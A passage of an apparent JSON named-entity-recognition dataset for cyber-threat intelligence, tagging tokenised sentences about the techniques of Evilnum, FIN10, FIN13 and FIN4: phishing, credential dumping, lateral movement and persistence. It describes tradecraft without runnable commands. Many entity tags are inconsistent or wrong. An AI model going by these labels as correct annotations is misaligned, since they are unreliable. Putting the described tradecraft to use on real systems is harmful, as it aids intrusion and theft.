"O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "sent", - "spearphishing", - "emails", - "designed", - "to", - "trick", - "the", - "recipient", - "into", - "opening", - "malicious", - "shortcut", - "links", - "which", - "downloads", - "a", - ".LNK", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "EVILNUM", - "has", - "used", - "the", - "malware", - "variant,", - "TerraTV,", - "to", - "run", - "a", - "legitimate", - "TeamViewer", - "application", - "to", - "connect", - "to", - "compromrised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "a", - "link", - "to", - "a", - "zip", - "file", - "hosted", - "on", - "Google", - "Drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "can", - "steal", - "cookies", - "and", - "session", - "information", - "from", - "browsers." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "used", - "a", - "component", - "called", - "TerraLoader", - "to", - "check", - "certain", - "hardware", - "and", - "file", - "information", - "to", - "detect", - "sandboxed", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "used", - "batch", - "scripts", - "and", - "scheduled", - "tasks", - "to", - "delete", - "critical", - "system", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "deployed", - "Meterpreter", - "stagers", - "and", - "SplinterRAT", - "instances", - "in", - "the", - "victim", - "network", - "after", - "moving", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "moved", - "laterally", - "using", - "the", - "Local", - "Administrator", - "account." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "uses", - "PowerShell", - "for", - "execution", - "as", - "well", - "as", - "PowerShell", - "Empire", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "established", - "persistence", - "by", - "using", - "the", - "Registry", - "option", - "in", - "PowerShell", - "Empire", - "to", - "add", - "a", - "Run", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "used", - "RDP", - "to", - "move", - "laterally", - "to", - "systems", - "in", - "the", - "victim", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "established", - "persistence", - "by", - "using", - "S4U", - "tasks", - "as", - "well", - "as", - "the", - "Scheduled", - "Task", - "option", - "in", - "PowerShell", - "Empire." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "used", - "Meterpreter", - "to", - "enumerate", - "users", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "relied", - "on", - "publicly-available", - "software", - "to", - "gain", - "footholds", - "and", - "establish", - "persistence", - "in", - "victim", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "used", - "stolen", - "credentials", - "to", - "connect", - "remotely", - "to", - "victim", - "networks", - "using", - "VPNs", - "protected", - "with", - "only", - "a", - "single", - "factor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN10", - "has", - "executed", - "malicious", - ".bat", - "files", - "containing", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "enumerated", - "all", - "users", - "and", - "their", - "roles", - "from", - "a", - "victim's", - "main", - "treasury", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "assigned", - "newly", - "created", - "accounts", - "the", - "sysadmin", - "role", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "compressed", - "the", - "dump", - "output", - "of", - "compromised", - "credentials", - "with", - "a", - "7zip", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "obtained", - "administrative", - "credentials", - "by", - "browsing", - "through", - "local", - "files", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "IISCrack.dll", - "as", - "a", - "side-loading", - "technique", - "to", - "load", - "a", - "malicious", - "version", - "of", - "httpodbc.dll", - "on", - "old", - "IIS", - "Servers", - "(CVE-2001-0507)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "injected", - "fraudulent", - "transactions", - "into", - "compromised", - "networks", - "that", - "mimic", - "legitimate", - "behavior", - "to", - "siphon", - "off", - "incremental", - "amounts", - "of", - "money." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "gathered", - "stolen", - "credentials,", - "sensitive", - "data", - "such", - "as", - "point-of-sale", - "(POS),", - "and", - "ATM", - "data", - "from", - "a", - "compromised", - "network", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "leveraged", - "default", - "credentials", - "for", - "authenticating", - "myWebMethods", - "(WMS)", - "and", - "QLogic", - "web", - "management", - "interface", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "`certutil`", - "to", - "decode", - "base64", - "encoded", - "versions", - "of", - "custom", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "can", - "identify", - "user", - "accounts", - "associated", - "with", - "a", - "Service", - "Principal", - "Name", - "and", - "query", - "Service", - "Principal", - "Names", - "within", - "the", - "domain", - "by", - "utilizing", - "the", - "following", - "scripts:", - "`GetUserSPNs.vbs`", - "and", - "`querySpn.vbs`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "exploited", - "known", - "vulnerabilities", - "such", - "as", - "CVE-2017-1000486", - "(Primefaces", - "Application", - "Expression", - "Language", - "Injection),", - "CVE-2015-7450", - "(WebSphere", - "Application", - "Server", - "SOAP", - "Deserialization", - "Exploit),", - "CVE-2010-5326", - "(SAP", - "NewWeaver", - "Invoker", - "Servlet", - "Exploit),", - "and", - "EDB-ID-24963", - "(SAP", - "NetWeaver", - "ConfigServlet", - "Remote", - "Code", - "Execution)", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "gained", - "access", - "to", - "compromised", - "environments", - "via", - "remote", - "access", - "services", - "such", - "as", - "the", - "corporate", - "virtual", - "private", - "network", - "(VPN)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "the", - "Windows", - "`dir`", - "command", - "to", - "enumerate", - "files", - "and", - "directories", - "in", - "a", - "victim's", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "observed", - "the", - "victim's", - "software", - "and", - "infrastructure", - "over", - "several", - "months", - "to", - "understand", - "the", - "technical", - "process", - "of", - "legitimate", - "financial", - "transactions,", - "prior", - "to", - "attempting", - "to", - "conduct", - "fraudulent", - "transactions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "researched", - "employees", - "to", - "target", - "for", - "social", - "engineering", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "created", - "hidden", - "files", - "and", - "folders", - "within", - "a", - "compromised", - "Linux", - "system", - "`/tmp`", - "directory.", - "FIN13", - "also", - "has", - "used", - "`attrib.exe`", - "to", - "hide", - "gathered", - "local", - "host", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "downloaded", - "additional", - "tools", - "and", - "malware", - "to", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "a", - "proxy", - "tool", - "to", - "communicate", - "between", - "compromised", - "assets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "`Ping`", - "and", - "`tracert`", - "for", - "network", - "reconnaissance", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "logged", - "the", - "keystrokes", - "of", - "victims", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "obtained", - "memory", - "dumps", - "with", - "ProcDump", - "to", - "parse", - "and", - "extract", - "credentials", - "from", - "a", - "victim's", - "LSASS", - "process", - "memory", - "with", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "created", - "MS-SQL", - "local", - "accounts", - "in", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "the", - "following", - "temporary", - "folders", - "on", - "compromised", - "Windows", - "and", - "Linux", - "systems", - "for", - "their", - "operations", - "prior", - "to", - "exfiltration:", - "`C:\\Windows\\Temp`", - "and", - "`/tmp`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "tools", - "such", - "as", - "Incognito", - "V2", - "for", - "token", - "manipulation", - "and", - "impersonation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "custom", - "malware", - "to", - "maintain", - "persistence", - "in", - "a", - "compromised", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "scheduled", - "tasks", - "names", - "such", - "as", - "`acrotyr`", - "and", - "`AppServicesr`", - "to", - "mimic", - "the", - "same", - "names", - "in", - "a", - "compromised", - "network's", - "`C:\\Windows`", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "masqueraded", - "staged", - "data", - "by", - "using", - "the", - "Windows", - "certutil", - "utility", - "to", - "generate", - "fake", - "Base64", - "encoded", - "certificates", - "with", - "the", - "input", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "masqueraded", - "WAR", - "files", - "to", - "look", - "like", - "legitimate", - "packages", - "such", - "as,", - "wsexample.war,", - "wsexamples.com,", - "examples.war,", - "and", - "exampl3s.war." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "replaced", - "legitimate", - "KeePass", - "binaries", - "with", - "trojanized", - "versions", - "to", - "collect", - "passwords", - "from", - "numerous", - "applications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "harvested", - "the", - "NTDS.DIT", - "file", - "and", - "leveraged", - "the", - "Impacket", - "tool", - "on", - "the", - "compromised", - "domain", - "controller", - "to", - "locally", - "decrypt", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "`nmap`", - "for", - "reconnaissance", - "efforts.", - "FIN13", - "has", - "also", - "scanned", - "for", - "internal", - "MS-SQL", - "servers", - "in", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "executed", - "net", - "view", - "commands", - "for", - "enumeration", - "of", - "open", - "shares", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "searched", - "for", - "infrastructure", - "that", - "can", - "provide", - "remote", - "access", - "to", - "an", - "environment", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "the", - "PowerShell", - "utility", - "`Invoke-SMBExec`", - "to", - "execute", - "the", - "pass", - "the", - "hash", - "method", - "for", - "lateral", - "movement", - "within", - "an", - "compromised", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "enumerated", - "all", - "users", - "and", - "roles", - "from", - "a", - "victim's", - "main", - "treasury", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "PowerShell", - "commands", - "to", - "obtain", - "DNS", - "data", - "from", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "web", - "shells", - "and", - "Java", - "tools", - "for", - "tunneling", - "capabilities", - "to", - "and", - "from", - "compromised", - "assets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "Windows", - "Registry", - "run", - "keys", - "such", - "as,", - "`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\hosts`", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "remotely", - "accessed", - "compromised", - "environments", - "via", - "Remote", - "Desktop", - "Services", - "(RDS)", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "leveraged", - "SMB", - "to", - "move", - "laterally", - "within", - "a", - "compromised", - "network", - "via", - "application", - "servers", - "and", - "SQL", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "remotely", - "accessed", - "compromised", - "environments", - "via", - "secure", - "shell", - "(SSH)", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "created", - "scheduled", - "tasks", - "in", - "the", - "`C:\\Windows`", - "directory", - "of", - "the", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "extracted", - "the", - "SAM", - "and", - "SYSTEM", - "registry", - "hives", - "using", - "the", - "`reg.exe`", - "binary", - "for", - "obtaining", - "password", - "hashes", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "collected", - "local", - "host", - "information", - "by", - "utilizing", - "Windows", - "commands", - "`systeminfo`,", - "`fsutil`,", - "and", - "`fsinfo`.", - "FIN13", - "has", - "also", - "utilized", - "a", - "compromised", - "Symantex", - "Altiris", - "console", - "and", - "LanDesk", - "account", - "to", - "retrieve", - "host", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "`nslookup`", - "and", - "`ipconfig`", - "for", - "network", - "reconnaissance", - "efforts.", - "FIN13", - "has", - "also", - "utilized", - "a", - "compromised", - "Symantec", - "Altiris", - "console", - "and", - "LanDesk", - "account", - "to", - "retrieve", - "network", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "`netstat`", - "and", - "other", - "net", - "commands", - "for", - "network", - "reconnaissance", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "publicly", - "available", - "tools", - "such", - "as", - "Mimikatz,", - "Impacket,", - "PWdump7,", - "ProcDump,", - "Nmap,", - "and", - "Incognito", - "V2", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "VBS", - "scripts", - "for", - "code", - "execution", - "on", - "comrpomised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "used", - "HTTP", - "requests", - "to", - "chain", - "multiple", - "web", - "shells", - "and", - "to", - "contact", - "actor-controlled", - "C2", - "servers", - "prior", - "to", - "exfiltrating", - "stolen", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "obfuscated", - "and", - "open-source", - "web", - "shells", - "such", - "as", - "JspSpy,", - "reGeorg,", - "MiniWebCmdShell,", - "and", - "Vonloesch", - "Jsp", - "File", - "Browser", - "1.2", - "to", - "enable", - "remote", - "code", - "execution", - "and", - "to", - "execute", - "commands", - "on", - "compromised", - "web", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "leveraged", - "`xp_cmdshell`", - "and", - "Windows", - "Command", - "Shell", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "machine.", - "FIN13", - "has", - "also", - "attempted", - "to", - "leverage", - "the", - "‘xp_cmdshell’", - "SQL", - "procedure", - "to", - "execute", - "remote", - "commands", - "on", - "internal", - "MS-SQL", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "utilized", - "`WMI`", - "to", - "execute", - "commands", - "and", - "move", - "laterally", - "on", - "compromised", - "Windows", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN13", - "has", - "leveraged", - "`WMI`", - "to", - "move", - "laterally", - "within", - "a", - "compromised", - "network", - "via", - "application", - "servers", - "and", - "SQL", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "created", - "rules", - "in", - "victims'", - "Microsoft", - "Outlook", - "accounts", - "to", - "automatically", - "delete", - "emails", - "containing", - "words", - "such", - "as", - "“hacked,\"", - "\"phish,\"", - "and", - "“malware\"", - "in", - "a", - "likely", - "attempt", - "to", - "prevent", - "organizations", - "from", - "communicating", - "about", - "their", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "presented", - "victims", - "with", - "spoofed", - "Windows", - "Authentication", - "prompts", - "to", - "collect", - "their", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "captured", - "credentials", - "via", - "fake", - "Outlook", - "Web", - "App", - "(OWA)", - "login", - "pages", - "and", - "has", - "also", - "used", - "a", - ".NET", - "based", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "lured", - "victims", - "to", - "launch", - "malicious", - "attachments", - "delivered", - "via", - "spearphishing", - "emails", - "(often", - "sent", - "from", - "compromised", - "accounts)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "lured", - "victims", - "to", - "click", - "malicious", - "links", - "delivered", - "via", - "spearphishing", - "emails", - "(often", - "sent", - "from", - "compromised", - "accounts)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FIN4", - "has", - "used", - 